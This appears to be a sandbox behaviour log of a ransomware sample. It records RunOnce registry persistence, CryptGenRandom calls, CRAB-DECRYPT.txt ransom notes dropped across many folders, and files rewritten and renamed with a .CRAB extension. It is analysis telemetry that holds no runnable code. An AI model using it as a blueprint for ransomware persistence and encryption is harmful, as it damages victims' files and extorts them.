1 | |
| Driver | Get Name | load_address = 1818165248 |
|
1 | |
| Driver | Get Name | load_address = 1818230784 |
|
1 | |
| Driver | Get Name | load_address = 1818296320 |
|
1 | |
| Driver | Get Name | load_address = 1818427392 |
|
1 | |
| Driver | Get Name | load_address = 1832648704 |
|
1 | |
| Driver | Get Name | load_address = 1834680320 |
|
1 | |
| Driver | Get Name | load_address = 1834811392 |
|
1 | |
| Driver | Get Name | load_address = 1834942464 |
|
1 | |
| Driver | Get Name | load_address = 1824522240 |
|
1 | |
| Driver | Get Name | load_address = 1824718848 |
|
1 | |
| Driver | Get Name | load_address = 1824784384 |
|
1 | |
| Driver | Get Name | load_address = 1825112064 |
|
1 | |
| Driver | Get Name | load_address = 1825767424 |
|
1 | |
| Driver | Get Name | load_address = 1825898496 |
|
1 | |
| Driver | Get Name | load_address = 1826095104 |
|
1 | |
| Driver | Get Name | load_address = 1826226176 |
|
1 | |
| Driver | Get Name | load_address = 1826750464 |
|
1 | |
| Driver | Get Name | load_address = 1827340288 |
|
1 | |
| Driver | Get Name | load_address = 1827405824 |
|
1 | |
| Driver | Get Name | load_address = 1827471360 |
|
1 | |
| Driver | Get Name | load_address = 1827536896 |
|
1 | |
| Driver | Get Name | load_address = 1827602432 |
|
1 | |
| Driver | Get Name | load_address = 1827930112 |
|
1 | |
| Driver | Get Name | load_address = 1828192256 |
|
1 | |
| Driver | Get Name | load_address = 1828323328 |
|
1 | |
| Driver | Get Name | load_address = 1828388864 |
|
1 | |
| Driver | Get Name | load_address = 1828519936 |
|
1 | |
| Driver | Get Name | load_address = 1828651008 |
|
1 | |
| Driver | Get Name | load_address = 1829044224 |
|
1 | |
| Driver | Get Name | load_address = 1829240832 |
|
1 | |
| Driver | Get Name | load_address = 1829699584 |
|
1 | |
| Driver | Get Name | load_address = 1829830656 |
|
1 | |
| Driver | Get Name | load_address = 1830354944 |
|
1 | |
| Driver | Get Name | load_address = 1831403520 |
|
1 | |
| Driver | Get Name | load_address = 1831469056 |
|
1 | |
| Driver | Get Name | load_address = 1831534592 |
|
1 | |
| Driver | Get Name | load_address = 1831600128 |
|
1 | |
| Driver | Get Name | load_address = 1832124416 |
|
1 | |
| Driver | Get Name | load_address = 1832189952 |
|
1 | |
| Driver | Get Name | load_address = 1827799040 |
|
1 | |
| Driver | Get Name | load_address = 1830879232 |
|
1 | |
| Driver | Get Name | load_address = 1831010304 |
|
1 | |
| Driver | Get Name | load_address = 1831206912 |
|
1 | |
| Driver | Get Name | load_address = 1831337984 |
|
1 | |
| Driver | Get Name | load_address = 1818558464 |
|
1 | |
| Driver | Get Name | load_address = 1827864576 |
|
1 | |
| Driver | Get Name | load_address = 1818689536 |
|
1 | |
| Driver | Get Name | load_address = 1818886144 |
|
1 | |
| Driver | Get Name | load_address = 1816920064 |
|
1 | |
| Driver | Get Name | load_address = 1817247744 |
|
1 | |
| Driver | Get Name | load_address = 1344339968 |
|
1 | |
| Driver | Get Name | load_address = 1360658432 |
|
1 | |
| Driver | Get Name | load_address = 1346371584 |
|
1 | |
| Driver | Get Name | load_address = 1817378816 |
|
1 | |
| Driver | Get Name | load_address = 1851523072 |
|
1 | |
| Driver | Get Name | load_address = 1347878912 |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 256 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Environment | Get Environment String | name = AppData, result_out = C:\Users\Nd9E1FYi\AppData\Roaming |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = wyzftwkvewc, data = "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe", size = 88, type = REG_SZ |
|
1 |
Thread 0x8b8
4277
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 1048576, size_out = 80 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 80 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, destination_filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Get Info | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 1048576, size_out = 608 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 608 |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 256 |
|
2 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini, destination_filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\settings.ini.CRAB |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Write | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, size = 3704 |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\InputPersonalization\TrainedDataStore\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Sidebar\Gadgets\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Documents and Settings\Default\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
